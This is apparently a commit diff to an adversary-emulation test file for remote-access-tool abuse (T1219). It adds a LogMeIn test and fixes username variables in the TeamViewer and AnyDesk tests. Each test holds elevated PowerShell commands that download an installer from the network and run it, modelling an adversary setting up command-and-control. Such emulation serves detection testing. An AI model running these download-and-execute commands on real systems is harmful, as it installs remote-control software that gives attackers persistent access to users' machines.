Update T1219.yaml (#970)

Added logmein download and execution. updated execution commands to reflect $env:username

atomics/T1219/T1219.yaml

@@ -13,7 +13,7 @@ atomic_tests:
     elevation_required: true
     command: |
       Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
-      C:\Users\$CurrentUser\Desktop\TeamViewer_Setup.exe
+      C:\Users\$env:username\Desktop\TeamViewer_Setup.exe
 
 - name: AnyDesk Files Detected Test on Windows
   description: |
@@ -25,4 +25,16 @@ atomic_tests:
     elevation_required: true
     command: |
       Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
-      C:\Users\$CurrentUser\Desktop\AnyDesk.exe
+      C:\Users\$env:username\Desktop\AnyDesk.exe
+
+- name: LogMeIn Files Detected Test on Windows
+  description: |
+    An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
+      C:\Users\$env:username\Desktop\LogMeInIgnition.msi